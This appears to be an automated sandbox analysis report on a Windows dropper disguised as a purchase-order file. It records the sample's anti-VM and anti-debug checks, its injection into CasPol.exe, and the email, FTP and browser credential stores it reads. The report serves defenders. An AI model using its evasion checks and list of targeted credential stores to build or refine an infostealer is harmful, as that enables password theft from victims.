Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 1_2_00404AB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3884:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3884:304:WilStaging_02
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Data Obfuscation

Source: Yara match File source: 00000008.00000000.41902252759.0000000001120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.42101494112.0000000003C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_715D30C0 push eax; ret 1_2_715D30EE
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7DB69 push ebp; ret 1_2_03C7DB17
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C752A5 push esp; ret 1_2_03C752B5
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7A24F push eax; ret 1_2_03C7A254
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C78E64 push ebp; ret 1_2_03C78EAC
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C78E72 push ebp; ret 1_2_03C78EAC
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C70D98 push ebp; ret 1_2_03C70E1A
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7BC4B push edi; iretd 1_2_03C7BC67
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7643A push edx; ret 1_2_03C7643B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_01048497 push edi; retn 0000h 8_2_01048499
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_010428E3 push eax; retf 8_2_010428E9
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_715D1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 1_2_715D1BFF
Source: C:\Users\user\Desktop\PO#4200000866.exe File created: C:\Users\user\AppData\Local\Temp\library.dll
Source: C:\Users\user\Desktop\PO#4200000866.exe File created: C:\Users\user\AppData\Local\Temp\nsdFF63.tmp\System.dll
Source: C:\Users\user\Desktop\PO#4200000866.exe File created: C:\Users\user\AppData\Local\Temp\DeviceServicePlugin.dll
Source: C:\Users\user\Desktop\PO#4200000866.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\PO#4200000866.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\PO#4200000866.exe File opened: C:\Program Files\qga\qga.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\qga\qga.exe
Source: PO#4200000866.exe, 00000001.00000002.42101669315.0000000003D71000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: PO#4200000866.exe, 00000001.00000002.42101669315.0000000003D71000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4436 Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\PO#4200000866.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\library.dll
Source: C:\Users\user\Desktop\PO#4200000866.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DeviceServicePlugin.dll
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71BC0 rdtsc 1_2_03C71BC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: threadDelayed 9323
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_1D6B0C40 sldt word ptr [eax] 8_2_1D6B0C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 1_2_00405D74
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_0040699E FindFirstFileW,FindClose, 1_2_0040699E
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_0040290B FindFirstFileW, 1_2_0040290B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\PO#4200000866.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\PO#4200000866.exe API call chain: ExitProcess graph end node
Source: PO#4200000866.exe, 00000001.00000002.42101961509.0000000005709000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.46717254333.0000000002F99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: PO#4200000866.exe, 00000001.00000002.42101961509.0000000005709000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.46717254333.0000000002F99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: CasPol.exe, 00000008.00000002.46717254333.0000000002F99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: PO#4200000866.exe, 00000001.00000002.42101961509.0000000005709000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.46717254333.0000000002F99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: PO#4200000866.exe, 00000001.00000002.42101961509.0000000005709000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.46717254333.0000000002F99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: PO#4200000866.exe, 00000001.00000002.42101669315.0000000003D71000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dll
Source: PO#4200000866.exe, 00000001.00000002.42101961509.0000000005709000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.46717254333.0000000002F99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: CasPol.exe, 00000008.00000002.46717254333.0000000002F99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: CasPol.exe, 00000008.00000002.46715733863.0000000001446000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.46715072344.00000000013E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: PO#4200000866.exe, 00000001.00000002.42101669315.0000000003D71000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: PO#4200000866.exe, 00000001.00000002.42101961509.0000000005709000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.46717254333.0000000002F99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: PO#4200000866.exe, 00000001.00000002.42101961509.0000000005709000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.46717254333.0000000002F99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: PO#4200000866.exe, 00000001.00000002.42101961509.0000000005709000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.46717254333.0000000002F99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: CasPol.exe, 00000008.00000002.46717254333.0000000002F99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_715D1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 1_2_715D1BFF
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71BC0 rdtsc 1_2_03C71BC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7B3DE mov eax, dword ptr fs:[00000030h] 1_2_03C7B3DE
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C83362 mov eax, dword ptr fs:[00000030h] 1_2_03C83362
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C832E6 mov eax, dword ptr fs:[00000030h] 1_2_03C832E6
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7B28A mov ebx, dword ptr fs:[00000030h] 1_2_03C7B28A
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7B240 mov ebx, dword ptr fs:[00000030h] 1_2_03C7B240
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7B240 mov eax, dword ptr fs:[00000030h] 1_2_03C7B240
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C81E75 mov eax, dword ptr fs:[00000030h] 1_2_03C81E75
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7B1CD mov eax, dword ptr fs:[00000030h] 1_2_03C7B1CD
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C815FF mov eax, dword ptr fs:[00000030h] 1_2_03C815FF
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7E542 mov eax, dword ptr fs:[00000030h] 1_2_03C7E542
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7B168 mov eax, dword ptr fs:[00000030h] 1_2_03C7B168
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7B126 mov eax, dword ptr fs:[00000030h] 1_2_03C7B126
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7A8DD mov eax, dword ptr fs:[00000030h] 1_2_03C7A8DD
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7B080 mov eax, dword ptr fs:[00000030h] 1_2_03C7B080
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7B003 mov eax, dword ptr fs:[00000030h] 1_2_03C7B003
Source: C:\Users\user\Desktop\PO#4200000866.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_0104EFC0 LdrInitializeThunk, 8_2_0104EFC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\PO#4200000866.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 1120000
Source: C:\Users\user\Desktop\PO#4200000866.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\PO#4200000866.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_00403640

Stealing of Sensitive Information

Source: Yara match File source: 00000008.00000002.46737865180.000000001D891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 1516, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Remote Access Functionality

Source: Yara match File source: 00000008.00000002.46737865180.000000001D891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 1516, type: MEMORYSTR